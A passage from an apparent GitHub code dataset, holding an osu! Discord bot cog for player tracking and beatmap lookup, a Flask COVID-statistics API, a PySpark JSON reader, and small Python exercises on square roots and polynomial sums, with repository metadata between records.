'HT', 'RX', 'DT', 'SD', 'HR', 'HD', 'EZ', 'NF']\r\n peppyNumbers = [16384, 4096, 1024, 576, 256, 128, 64, 32, 16, 8, 2, 1]\r\n\r\n for i in range(len(mods)):\r\n if number >= peppyNumbers[i]:\r\n number-= peppyNumbers[i]\r\n mod_list.append(mods[i])\r\n return mod_list\r\n\r\n # ---------------------------- Detect Links ------------------------------\r\n # called by listener\r\n async def find_link(self, message):\r\n if message.author.id == self.bot.user.id:\r\n return\r\n\r\n if \"https://\" in message.content:\r\n # process the the idea from a url in msg\r\n all_urls = []\r\n original_message = message.content\r\n get_urls = re.findall(\"(https:\\/\\/[^\\s]+)([ ]\\+[A-Za-z][^\\s]+)?\", original_message)\r\n\r\n for url in get_urls:\r\n all_urls.append(url[0])\r\n\r\n # get rid of duplicates\r\n all_urls = list(set(all_urls))\r\n\r\n if 'https://osu.ppy.sh/u/' in original_message:\r\n await self.process_user_url(all_urls, message)\r\n\r\n if 'https://osu.ppy.sh/s/' in original_message or 'https://osu.ppy.sh/b/' in original_message:\r\n await self.process_beatmap(all_urls, message)\r\n\r\n # processes user input for user profile link\r\n async def process_user_url(self, all_urls, message):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n server_user = message.author\r\n server = message.author.server\r\n\r\n for url in all_urls:\r\n try:\r\n if url.find('https://osu.ppy.sh/u/') != -1:\r\n user_id = url.replace('https://osu.ppy.sh/u/','')\r\n user_info = await get_user(key, self.osu_settings[\"type\"][\"default\"], user_id, 0)\r\n if user_id in self.user_settings:\r\n gamemode = self.user_settings[user_id][\"default_gamemode\"]\r\n else:\r\n gamemode = 0\r\n em = await self._get_user_info(self.osu_settings[\"type\"][\"default\"], server, server_user, user_info[0], gamemode)\r\n await self.bot.send_message(message.channel, embed = em)\r\n except:\r\n await self.bot.send_message(message.channel, \"That user doesn't exist.\")\r\n\r\n # processes user input for the beatmap\r\n async def process_beatmap(self, all_urls, message):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n\r\n for url in all_urls:\r\n try:\r\n if url.find('https://osu.ppy.sh/s/') != -1:\r\n beatmap_id = url.replace('https://osu.ppy.sh/s/','')\r\n beatmap_info = await get_beatmapset(key, self.osu_settings[\"type\"][\"default\"], beatmap_id)\r\n await self.disp_beatmap(message, beatmap_info, url)\r\n elif url.find('https://osu.ppy.sh/b/') != -1:\r\n beatmap_id = url.replace('https://osu.ppy.sh/b/','')\r\n beatmap_info = await get_beatmap(key, self.osu_settings[\"type\"][\"default\"], beatmap_id)\r\n await self.disp_beatmap(message, beatmap_info, url)\r\n except:\r\n await self.bot.send_message(message.channel, \"That beatmap doesn't exist.\")\r\n\r\n # displays the beatmap properly\r\n async def disp_beatmap(self, message, beatmap, beatmap_url:str):\r\n # process time\r\n num_disp = min(len(beatmap), self.max_map_disp)\r\n if (len(beatmap)>self.max_map_disp):\r\n msg = \"Found {} maps, but only displaying {}.\\n\".format(len(beatmap), self.max_map_disp)\r\n else:\r\n msg = \"Found {} map(s).\\n\".format(len(beatmap))\r\n\r\n beatmap_msg = \"\"\r\n m, s = divmod(int(beatmap[0]['total_length']), 60)\r\n tags = beatmap[0]['tags']\r\n if tags == \"\":\r\n tags = \"-\"\r\n desc = ' **Length:** {}:{} **BPM:** {}\\n**Tags:** {}\\n------------------'.format(m, str(s).zfill(2), beatmap[0]['bpm'], tags)\r\n em = discord.Embed(description = desc, colour=0xeeeeee)\r\n em.set_author(name=\"{} - {} by {}\".format(beatmap[0]['artist'], beatmap[0]['title'], beatmap[0]['creator']), url=beatmap_url)\r\n\r\n # sort maps\r\n map_order = []\r\n for i in range(num_disp):\r\n map_order.append((i,float(beatmap[i]['difficultyrating'])))\r\n\r\n map_order = sorted(map_order, key=operator.itemgetter(1), reverse=True)\r\n\r\n for i, diff in map_order:\r\n beatmap_info = \"\"\r\n beatmap_info += \"**▸Difficulty:** {:.2f}★ **Max Combo:** {}\\n\".format(float(beatmap[i]['difficultyrating']), beatmap[i]['max_combo'])\r\n beatmap_info += \"**▸AR:** {} **▸OD:** {} **▸HP:** {} **▸CS:** {}\\n\".format(beatmap[i]['diff_approach'], beatmap[i]['diff_overall'], beatmap[i]['diff_drain'], beatmap[i]['diff_size'])\r\n em.add_field(name = \"__{}__\\n\".format(beatmap[i]['version']), value = beatmap_info, inline = False)\r\n\r\n page = urllib.request.urlopen(beatmap_url)\r\n soup = BeautifulSoup(page.read(), \"html.parser\")\r\n map_image = [x['src'] for x in soup.findAll('img', {'class': 'bmt'})]\r\n map_image_url = 'http:{}'.format(map_image[0]).replace(\" \", \"%\")\r\n # await self.bot.send_message(message.channel, map_image_url)\r\n em.set_thumbnail(url=map_image_url)\r\n await self.bot.send_message(message.channel, msg, embed = em)\r\n\r\n # --------------------- Tracking Section -------------------------------\r\n @osutrack.command(pass_context=True, no_pm=True)\r\n async def list(self, ctx):\r\n \"\"\"Check which players are currently tracked\"\"\"\r\n server = ctx.message.server\r\n channel = ctx.message.channel\r\n user = ctx.message.author\r\n\r\n em = discord.Embed(colour=user.colour)\r\n em.set_author(name=\"Osu! Players Currently Tracked in {}\".format(server.name), icon_url = server.icon_url)\r\n channel_users = {}\r\n\r\n target_channel = None\r\n for username in self.track.keys():\r\n if server.id in self.track[username][\"servers\"]:\r\n target_channel = find(lambda m: m.id == self.track[username]['servers'][server.id][\"channel\"], server.channels)\r\n if target_channel.name not in channel_users:\r\n channel_users[target_channel.name] = []\r\n channel_users[target_channel.name].append(username)\r\n\r\n if target_channel and channel_users[target_channel.name]:\r\n channel_users[target_channel.name] = sorted(channel_users[target_channel.name])\r\n for channel_name in channel_users.keys():\r\n em.add_field(name = \"__#{} ({})__\".format(channel_name, len(channel_users[channel_name])), value = \", \".join(channel_users[channel_name]))\r\n else:\r\n em.description = \"None.\"\r\n\r\n await self.bot.say(embed = em)\r\n\r\n @osutrack.command(pass_context=True, no_pm=True)\r\n @checks.mod_or_permissions(manage_messages=True)\r\n async def add(self, ctx, *usernames):\r\n \"\"\"Adds a player to track for top scores.\"\"\"\r\n server = ctx.message.server\r\n channel = ctx.message.channel\r\n\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n msg = \"\"\r\n count_add = 0\r\n\r\n if usernames == (None):\r\n await self.bot.say(\"Please enter a user\")\r\n return\r\n\r\n for username in usernames:\r\n userinfo = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, 0))\r\n if not userinfo or len(userinfo) == 0:\r\n msg+=\"`{}` does not exist in the osu! database.\\n\".format(username)\r\n else:\r\n if username not in self.track:\r\n self.track[username] = {}\r\n\r\n if server.id not in self.track[username]:\r\n self.track[username][\"servers\"] = {}\r\n self.track[username][\"servers\"][server.id] = {}\r\n\r\n # add channels that care about the user\r\n if \"channel\" not in self.track[username][\"servers\"][server.id]:\r\n self.track[username][\"servers\"][server.id][\"channel\"] = channel.id\r\n\r\n # add current userinfo\r\n if \"userinfo\" not in self.track[username]:\r\n self.track[username][\"userinfo\"] = {}\r\n for mode in modes:\r\n self.track[username][\"userinfo\"][mode] = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, self._get_gamemode_number(mode)))[0]\r\n\r\n # add last tracked time\r\n current_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\r\n self.track[username][\"last_check\"] = current_time\r\n count_add += 1\r\n msg+=\"**`{}` added. Will now track on `#{}`**\\n\".format(username, channel.name)\r\n else:\r\n if server.id in self.track[username][\"servers\"]:\r\n if channel.id == self.track[username][\"servers\"][server.id][\"channel\"]:\r\n msg+=\"**Already tracking `{}` on `#{}.`**\\n\".format(username, channel.name)\r\n else:\r\n self.track[username][\"servers\"][server.id][\"channel\"] = channel.id # add a channel to track\r\n count_add += 1\r\n msg+=\"**`{}` now tracking on `#{}`**\\n\".format(username, channel.name)\r\n else:\r\n if server.id not in self.track[username][\"servers\"]:\r\n self.track[username][\"servers\"][server.id] = {}\r\n self.track[username][\"servers\"][server.id][\"channel\"] = channel.id # add a channel to track\r\n count_add += 1\r\n msg+=\"**`{}` added. Will now track on `#{}`**\\n\".format(username, channel.name)\r\n\r\n fileIO(\"data/osu/track.json\", \"save\", self.track)\r\n if len(msg) > 500:\r\n await self.bot.say(\"**Added `{}` users to tracking on `#{}`.**\".format(count_add, channel.name))\r\n else:\r\n await self.bot.say(msg)\r\n\r\n @osutrack.command(pass_context=True, no_pm=True)\r\n @checks.mod_or_permissions(manage_messages=True)\r\n async def remove(self, ctx, *usernames:str):\r\n \"\"\"Removes a player to track for top scores.\"\"\"\r\n server = ctx.message.server\r\n channel = ctx.message.channel\r\n msg = \"\"\r\n count_remove = 0\r\n\r\n if usernames == (None):\r\n await self.bot.say(\"Please enter a user\")\r\n return\r\n\r\n for username in usernames:\r\n if username in self.track and \"servers\" in self.track[username] and server.id in self.track[username][\"servers\"]:\r\n if channel.id == self.track[username][\"servers\"][server.id][\"channel\"]:\r\n del self.track[username][\"servers\"][server.id]\r\n if len(self.track[username][\"servers\"].keys()) == 0:\r\n del self.track[username]\r\n msg+=\"**No longer tracking `{}` in `#{}`.**\\n\".format(username, channel.name)\r\n count_remove += 1\r\n fileIO(\"data/osu/track.json\", \"save\", self.track)\r\n else:\r\n msg+=\"**`{}` is not currently being tracked in `#{}`.**\\n\".format(username, channel.name)\r\n else:\r\n msg+=\"**`{}` is not currently being tracked.**\\n\".format(username)\r\n\r\n if len(msg) > 500:\r\n await self.bot.say(\"**Removed `{}` users from tracking on `#{}`.**\".format(count_remove, channel.name))\r\n else:\r\n await self.bot.say(msg)\r\n\r\n # used to track top plays of specified users\r\n async def play_tracker(self):\r\n key = self.osu_api_key[\"osu_api_key\"]\r\n while self == self.bot.get_cog('Osu'):\r\n # get all keys() to grab all current tracking users\r\n log.debug(\"looping through all users\")\r\n for username in self.track.keys():\r\n log.debug(\"checking {}\".format(username))\r\n # if the user's current top 10 scores are different from new top 10\r\n try:\r\n new_plays = {}\r\n for mode in modes:\r\n new_plays[mode] = await get_user_best(key, self.osu_settings[\"type\"][\"default\"], username, self._get_gamemode_number(mode), self.osu_settings[\"num_track\"])\r\n\r\n # gamemode = word\r\n for gamemode in self.track[username][\"userinfo\"].keys():\r\n log.debug(\"examining gamemode {}\".format(gamemode))\r\n last_check = datetime.datetime.strptime(self.track[username][\"last_check\"], '%Y-%m-%d %H:%M:%S')\r\n new_timestamps = []\r\n for new_play in new_plays[gamemode]:\r\n new_timestamps.append(datetime.datetime.strptime(new_play['date'], '%Y-%m-%d %H:%M:%S'))\r\n current_info = self.track[username][\"userinfo\"][gamemode] # user information\r\n score_gamemode = self._get_gamemode_display(gamemode)\r\n\r\n # loop to check what's different\r\n for i in range(len(new_timestamps)):\r\n if last_check != None and new_timestamps[i] != None and new_timestamps[i] > last_check:\r\n #print(\"Comparing new {} to old {}\".format(new_timestamps[i], last_check))\r\n top_play_num = i+1\r\n play = new_plays[gamemode][i]\r\n play_map = await get_beatmap(key, self.osu_settings[\"type\"][\"default\"], play['beatmap_id'])\r\n new_user_info = list(await get_user(key, self.osu_settings[\"type\"][\"default\"], username, self._get_gamemode_number(gamemode)))\r\n new_user_info = new_user_info[0]\r\n\r\n # send appropriate message to channel\r\n log.debug(\"creating top play\")\r\n if gamemode in self.track[username][\"userinfo\"]:\r\n old_user_info = self.track[username][\"userinfo\"]\r\n em = self._create_top_play(top_play_num, play, play_map, old_user_info[gamemode], new_user_info, score_gamemode)\r\n else:\r\n old_user_info = None\r\n em = self._create_top_play(top_play_num, play, play_map, old_user_info, new_user_info, score_gamemode)\r\n\r\n log.debug(\"sending embed\")\r\n for server_id in self.track[username]['servers'].keys():\r\n server = find(lambda m: m.id == server_id, self.bot.servers)\r\n if server_id not in self.osu_settings or \"tracking\" not in self.osu_settings[server_id] or self.osu_settings[server_id][\"tracking\"] == True:\r\n channel = find(lambda m: m.id == self.track[username]['servers'][server_id][\"channel\"], server.channels)\r\n await self.bot.send_message(channel, embed = em)\r\n\r\n #print(\"Setting last changed time to {}\".format(new_timestamps[i]))\r\n self.track[username][\"userinfo\"][gamemode] = new_user_info\r\n self.track[username][\"last_check\"] = new_timestamps[i].strftime('%Y-%m-%d %H:%M:%S')\r\n fileIO(\"data/osu/track.json\", \"save\", self.track)\r\n break\r\n except:\r\n log.info(\"Failed to load top score for\".format(username))\r\n\r\n log.debug(\"sleep 60 seconds\")\r\n await asyncio.sleep(60)\r\n\r\n def _create_top_play(self, top_play_num, play, beatmap, old_user_info, new_user_info, gamemode):\r\n beatmap_url = 'https://osu.ppy.sh/b/{}'.format(play['beatmap_id'])\r\n user_url = 'https://{}/u/{}'.format(self.osu_settings[\"type\"][\"default\"], new_user_info['user_id'])\r\n profile_url = 'http://s.ppy.sh/a/{}.png'.format(new_user_info['user_id'])\r\n beatmap = beatmap[0]\r\n\r\n # get infomation\r\n log.debug(\"getting change information\")\r\n m, s = divmod(int(beatmap['total_length']), 60)\r\n mods = self.mod_calculation(play['enabled_mods'])\r\n if not mods:\r\n mods = []\r\n mods.append('No Mod')\r\n em = discord.Embed(description='', colour=0xeeeeee)\r\n acc = self.calculate_acc(play, int(beatmap['mode']))\r\n\r\n # grab beatmap image\r\n log.debug(\"getting map image\")\r\n page = urllib.request.urlopen(beatmap_url)\r\n soup = BeautifulSoup(page.read(), \"html.parser\")\r\n map_image = [x['src'] for x in soup.findAll('img', {'class': 'bmt'})]\r\n map_image_url = 'http:{}'.format(map_image[0])\r\n em.set_thumbnail(url=map_image_url)\r\n log.debug(\"creating embed\")\r\n em.set_author(name=\"New #{} for {} in {}\".format(top_play_num, new_user_info['username'], gamemode), icon_url = profile_url, url = user_url)\r\n\r\n info = \"\"\r\n info += \"▸ [**__{} [{}]__**]({})\\n\".format(beatmap['title'], beatmap['version'], beatmap_url)\r\n info += \"▸ +{} ▸ **{:.2f}%** ▸ **{}** Rank\\n\".format(','.join(mods), float(acc), play['rank'])\r\n info += \"▸ **{:.2f}★** ▸ {}:{} ▸ {}bpm\\n\".format(float(beatmap['difficultyrating']), m, str(s).zfill(2), beatmap['bpm'])\r\n if old_user_info != None:\r\n dpp = float(new_user_info['pp_raw']) - float(old_user_info['pp_raw'])\r\n info += \"▸ {} ▸ x{} ▸ **{:.2f}pp (+{:.2f})**\\n\".format(play['score'], play['maxcombo'], float(play['pp']), dpp)\r\n info += \"▸ #{} → #{} ({}#{} → #{})\".format(old_user_info['pp_rank'], new_user_info['pp_rank'], new_user_info['country'], old_user_info['pp_country_rank'], new_user_info['pp_country_rank'])\r\n else:\r\n info += \"▸ {} ▸ x{} ▸ **{:.2f}pp**\\n\".format(play['score'], play['maxcombo'], float(play['pp']))\r\n info += \"▸ #{} ({}#{})\".format(new_user_info['pp_rank'], new_user_info['country'], new_user_info['pp_country_rank'])\r\n em.description = info\r\n return em\r\n\r\n###-------------------------Python wrapper for osu! api-------------------------\r\n\r\n# Gets the beatmap\r\nasync def get_beatmap(key, api:str, beatmap_id):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"b\", beatmap_id))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_beatmaps?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Gets the beatmap set\r\nasync def get_beatmapset(key, api:str, set_id):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"s\", set_id))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_beatmaps?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Grabs the scores\r\nasync def get_scores(key, api:str, beatmap_id, user_id, mode):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"b\", beatmap_id))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_scores?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\nasync def get_user(key, api:str, user_id, mode):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_user?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\nasync def get_user_best(key, api:str, user_id, mode, limit):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n url_params.append(parameterize_limit(limit))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_user_best?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Returns the user's ten most recent plays.\r\nasync def get_user_recent(key, api:str, user_id, mode):\r\n url_params = []\r\n\r\n url_params.append(parameterize_key(key))\r\n url_params.append(parameterize_id(\"u\", user_id))\r\n url_params.append(parameterize_mode(mode))\r\n\r\n async with aiohttp.get(build_request(url_params, \"https://{}/api/get_user_recent?\".format(api))) as resp:\r\n return await resp.json()\r\n\r\n# Returns the full API request URL using the provided base URL and parameters.\r\ndef build_request(url_params, url):\r\n for param in url_params:\r\n url += str(param)\r\n if (param != \"\"):\r\n url += \"&\"\r\n return url[:-1]\r\n\r\ndef parameterize_event_days(event_days):\r\n if (event_days == \"\"):\r\n event_days = \"event_days=1\"\r\n elif (int(event_days) >= 1 and int(event_days) <= 31):\r\n event_days = \"event_days=\" + str(event_days)\r\n else:\r\n print(\"Invalid Event Days\")\r\n return event_days\r\n\r\ndef parameterize_id(t, id):\r\n if (t != \"b\" and t != \"s\" and t != \"u\" and t != \"mp\"):\r\n print(\"Invalid Type\")\r\n if (len(str(id)) != 0):\r\n return t + \"=\" + str(id)\r\n else:\r\n return \"\"\r\n\r\ndef parameterize_key(key):\r\n if (len(key) == 40):\r\n return \"k=\" + key\r\n else:\r\n print(\"Invalid Key\")\r\n\r\ndef parameterize_limit(limit):\r\n ## Default case: 10 scores\r\n if (limit == \"\"):\r\n limit = \"limit=10\"\r\n elif (int(limit) >= 1 and int(limit) <= 100):\r\n limit = \"limit=\" + str(limit)\r\n else:\r\n print(\"Invalid Limit\")\r\n return limit\r\n\r\ndef parameterize_mode(mode):\r\n ## Default case: 0 (osu!)\r\n if (mode == \"\"):\r\n mode = \"m=0\"\r\n elif (int(mode) >= 0 and int(mode) <= 3):\r\n mode = \"m=\" + str(mode)\r\n else:\r\n print(\"Invalid Mode\")\r\n return mode\r\n\r\n###-------------------------Setup-------------------------\r\ndef check_folders():\r\n if not os.path.exists(\"data/osu\"):\r\n print(\"Creating data/osu folder...\")\r\n os.makedirs(\"data/osu\")\r\n\r\ndef check_files():\r\n osu_api_key = {\"osu_api_key\" : \"\"}\r\n api_file = \"data/osu/apikey.json\"\r\n\r\n if not fileIO(api_file, \"check\"):\r\n print(\"Adding data/osu/apikey.json...\")\r\n fileIO(api_file, \"save\", osu_api_key)\r\n else: # consistency check\r\n current = fileIO(api_file, \"load\")\r\n if current.keys() != osu_api_key.keys():\r\n for key in system.keys():\r\n if key not in osu_api_key.keys():\r\n current[key] = osu_api_key[key]\r\n print(\"Adding \" + str(key) +\r\n \" field to osu apikey.json\")\r\n fileIO(api_file, \"save\", current)\r\n\r\n # creates file for user backgrounds\r\n user_file = \"data/osu/user_settings.json\"\r\n if not fileIO(user_file, \"check\"):\r\n print(\"Adding data/osu/user_settings.json...\")\r\n fileIO(user_file, \"save\", {})\r\n\r\n # creates file for player tracking\r\n user_file = \"data/osu/track.json\"\r\n if not fileIO(user_file, \"check\"):\r\n print(\"Adding data/osu/track.json...\")\r\n fileIO(user_file, \"save\", {})\r\n\r\n # creates file for server to use\r\n settings_file = \"data/osu/osu_settings.json\"\r\n if not fileIO(settings_file, \"check\"):\r\n print(\"Adding data/osu/osu_settings.json...\")\r\n fileIO(settings_file, \"save\", {\r\n \"type\": {\r\n \"default\": \"osu.ppy.sh\",\r\n \"ripple\":\"ripple.moe\"\r\n },\r\n \"num_track\" : 50,\r\n \"num_best_plays\": 5,\r\n })\r\n\r\ndef setup(bot):\r\n check_folders()\r\n check_files()\r\n\r\n n = Osu(bot)\r\n loop = asyncio.get_event_loop()\r\n loop.create_task(n.play_tracker())\r\n bot.add_listener(n.find_link, \"on_message\")\r\n bot.add_cog(n)\r\n","repo_name":"AznStevy/Maybe-Useful-Cogs","sub_path":"osu/osu.py","file_name":"osu.py","file_ext":"py","file_size_in_byte":57308,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"81"} +{"seq_id":"71689234825","text":"from decouple import config\n\nimport os\nimport sys\nimport subprocess\nsubprocess.call(['pip3', 'install', '-r', 'requirements.txt'])\n\nfrom flask import Flask\nfrom flask_cors import CORS\nfrom flask import request\nfrom default_json_data import Default_JSON_Data\nfrom countries import Countries\n\nimport import_data\nimport user_interact\nimport example_graphs\n\nimport numpy as np\nimport pandas as pd\nimport datetime as DT \nimport json\n\nWHO_DATA_SET = import_data.WHO_Data_Set() \ndata = json.loads(WHO_DATA_SET.rtn_dt_json())\n\n# Loop through\n# Look at countries to build an array of them.\n\nWHO_DATA_SET.sortCountries(data)\n\napp = Flask(__name__)\nCORS(app)\n\n# Functions\ndef to_json(obj):\n json_str = json.dumps(obj.__dict__)\n return json.loads(json_str)\n \n@app.route('/', methods=['GET'])\ndef index():\n return {\n\t 'message': 'API is operational',\n 'status': '200'\n }\n\n@app.route('/worldwide', methods=['GET'])\ndef worldwide():\n # arg = request.args.get('country')\n # print('arg')\n # print(arg)\n # return_data_index = WHO_DATA_SET.find_country_index(arg)\n # return data[return_data_index]\n\n # Get Country Data:\n country = request.args.get(\"country\")\n index = WHO_DATA_SET.find_country_index(country)\n country_rtn = data[index]\n\n # Get Global Data:\n global_rtn = data[0]\n\n # Get Continental Data:\n countries_within_region = WHO_DATA_SET.find_countries_within_region(data, data[index][\"WHO Region\"])\n \n\n return to_json(Default_JSON_Data(global_rtn, country_rtn, countries_within_region))\n\n@app.route('/who-countries', methods=['GET'])\ndef who_countries():\n rtn_countries = []\n\n for i in data:\n rtn_countries.append(i[\"Name\"])\n\n my_json = to_json(Countries(rtn_countries))\n return my_json\n\n@app.route('/defaultData', methods=['GET'])\ndef defaultData():\n return {\n 'names': ['Deaths / Recoveries', 'Information for each country in: ', 'Deaths / Recoveries / Living / Infected'],\n 'continent': 'Europe',\n 'Country': 'UK'\n }\n \n@app.route('/', defaults={'path': ''})\n@app.route('/<path:path>', methods=['GET'])\ndef catch_all(path):\n return {\n 'status': '404',\n\t 'message': 'Request not found'\n }\n\nif config('environment') == \"production\":\n app.run()\nelif __name__ == '__main__':\n app.run(debug=True)\n\n\n# /help command\n#testinput - input(\"Type /Help for commands: \")\n#if testinput == '/Help':\n# print(\"placeholer\")\n\n# # Getting todays date\n# today = DT.date.today()\n# # Getting date of 7 days ago?\n# #week = today - DT.timedelta(days-7)\n# print(today)\n\n# import_data.WHO_Data_Set()\n# a = example_graphs.Data_To_JSON([\"India\"], \"Cases - cumulative total\")\n# #import_data.WHO_Data_Set.Test_Graph()\n# #example_graphs.Data_To_JSON()\n\n# example_graphs.Test_Graph()\n# print('hello')\n# print(a)\n# #Run the app.s\n# #if __name__ == '__main__':\n# #\tapp.run(host='localhost', debug=True)\n\n\n\n","repo_name":"Jack-Hartman/UoL-TSE-G34","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"8247776128","text":"from pyspark.sql import SparkSession\n\n\nclass ReadJson:\n @staticmethod\n def json_read():\n # Creating Spark Session\n spark = SparkSession.builder.appName(\"ReadJson\").master(\"local[*]\").getOrCreate()\n\n # Read JSON file into dataframe\n read_json_date = spark.read.json('C:\\\\Project\\\\Files\\\\Input\\\\json\\\\office.json').cache()\n # read_json_date = spark.read.json.path('C:\\Project\\Files\\Input\\json\\Sample-JSON.json')\n\n print(read_json_date.show())\n\n\nif __name__ == \"__main__\":\n ReadJson.json_read()\n","repo_name":"ripattna/Project","sub_path":"PySpark/com/dataframe/ReadJson.py","file_name":"ReadJson.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15839416114","text":"n=int(input(\"enter a number to find square root\"))\r\nh=int(input(\"enter no of approximation iterations\"))\r\napprox = 0.5 * n\r\nfor i in range(h):\r\n betterapprox = 0.5 * (approx + n/approx)\r\n approx = betterapprox\r\n\r\nprint(approx)\r\n\r\nprint(\"another way\")\r\nn=int(input(\"enter a number to find square root\"))\r\n\r\napprox = 0.5 * n\r\nbetter = 0.5 * (approx + n/approx)\r\nwhile better != approx:\r\n approx = better\r\n better = 0.5 * (approx + n/approx)\r\nprint(approx)\r\n\r\n","repo_name":"sureshanandcse/Python","sub_path":"squareroot_NR.py","file_name":"squareroot_NR.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36490828560","text":"# Даны два файла, в каждом из которых находится запись многочлена. Задача - сформировать файл,\n# содержащий сумму многочленов.\nimport random\n\n\ndef fill_list_nums(a, b, len):\n list_nums = []\n for item in range(len):\n list_nums.append(random.randint(a, b))\n return list_nums\n\n\ndef get_first_position_not_zero(list):\n result = -1\n for item in range(len(list) - 1, -1, -1):\n if list[item] != 0:\n result = item\n break\n return result\n\n\ndef isZero(list, pos):\n result = False\n if list[pos] == 0:\n result = True\n return result\n\n\ndef generate_x(coef, deg):\n coef = str(abs(coef))\n deg = str(abs(deg))\n if coef == '0': return ''\n # if coef == '1': coef = ''\n deg_out = 'x^' + deg\n if deg == '0': deg_out = ''\n if deg == '1': deg_out = 'x'\n return coef + deg_out\n\n\n# def get_polynomial(list):\n# s = ''\n# j = get_first_position_not_zero(list)\n# s += generate_x(list[j], len(list) - j)\n# for k in range(len(list) - j, 0, -1):\n# x = generate_x(list[k - 1], k - 1)\n# print(list[k - 1], k - 1, x)\n# if x == '':\n# continue\n# s += ' + ' + x\n# print(s)\n\ndef get_polynomial(list):\n s = ''\n for i in range(len(list)):\n if i != len(list) - 1 and list[i] != 0 and i != len(list) - 2:\n s += f'{list[i]}x^{len(list) - i - 1}'\n if list[i + 1] != 0:\n s += ' + '\n elif i == len(list) - 2 and list[i] != 0:\n s += f'{list[i]}x'\n if list[i + 1] != 0:\n s += ' + '\n elif i == len(list) - 1 and list[i] != 0:\n s += f'{list[i]} = 0'\n elif i == len(list) - 1 and list[i] == 0:\n s += ' = 0'\n return s\n\n\n# получение степени многочлена\ndef get_deg(k):\n if 'x^' in k:\n i = k.find('^')\n num = int(k[i + 1:])\n elif ('x' in k) and ('^' not in k):\n num = 1\n else:\n num = -1\n return num\n\n\n# получение коэффицента члена многочлена\ndef get_coef(k):\n if 'x' in k:\n i = k.find('x')\n num = int(k[:i])\n return num\n\n\n# разбор многочлена и получение его коэффициентов\ndef calc_mn(st):\n st = st[0].replace(' ', '').split('=')\n st = st[0].split('+')\n lst = []\n l = len(st)\n k = 0\n if get_deg(st[-1]) == -1:\n lst.append(int(st[-1]))\n l -= 1\n k = 1\n i = 1 # степень\n ii = l - 1 # индекс\n while ii >= 0:\n if get_deg(st[ii]) != -1 and get_deg(st[ii]) == i:\n lst.append(get_coef(st[ii]))\n ii -= 1\n i += 1\n else:\n lst.append(0)\n i += 1\n\n return lst\n\n\n# создание двух файлов\nmin = 0\nmax = 100\nk1 = int(input(\"Введите натуральную степень многочлена k1 = \"))\nk2 = int(input(\"Введите натуральную степень многочлена k2 = \"))\nlist1 = fill_list_nums(min, max + 1, k1 + 1)\nlist2 = fill_list_nums(min, max + 1, k2 + 1)\n\npos_not_zero = get_first_position_not_zero(list1)\nif len(list1) == 0 or pos_not_zero == -1:\n print('Многочлен невозможно создать len = 0 or pos_not_zero == -1')\n exit()\npolynomial1 = get_polynomial(list1)\nprint(polynomial1)\nwith open('polynomial1.txt', 'w') as data:\n data.write(polynomial1)\n\npos_not_zero = get_first_position_not_zero(list2)\nif len(list2) == 0 or pos_not_zero == -1:\n print('Многочлен невозможно создать len = 0 or pos_not_zero == -1')\n exit()\npolynomial2 = get_polynomial(list2)\nprint(polynomial2)\nwith open('polynomial2.txt', 'w') as data:\n data.write(polynomial2)\n\n# нахождение суммы многочлена\n\nwith open('polynomial1.txt', 'r') as data:\n polynomial1 = data.readlines()\nwith open('polynomial2.txt', 'r') as data:\n polynomial2 = data.readlines()\nprint(f\"Первый многочлен {polynomial1}\")\nprint(f\"Второй многочлен {polynomial2}\")\nlst1 = calc_mn(polynomial1)\nlst2 = calc_mn(polynomial2)\nll = len(lst1)\nif len(lst1) > len(lst2):\n ll = len(lst2)\nlst_new = [lst1[i] + lst2[i] for i in range(ll)]\nif len(lst1) > len(lst2):\n mm = len(lst1)\n for i in range(ll, mm):\n lst_new.append(lst1[i])\nelse:\n mm = len(lst2)\n for i in range(ll, mm):\n lst_new.append(lst2[i])\npolynomial_sum = get_polynomial(lst_new)\nwith open('polynomial_sum.txt', 'w') as data:\n data.write(polynomial_sum)\nwith open('polynomial_sum.txt', 'r') as data:\n polynomial_sum = data.readlines()\nprint(f\"Результирующий многочлен {polynomial_sum}\")\n","repo_name":"ArtsmanDan/python_base","sub_path":"sem4HW/task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72333107466","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nFile: main.py\nAuthor: Sergio Tabares Hernández 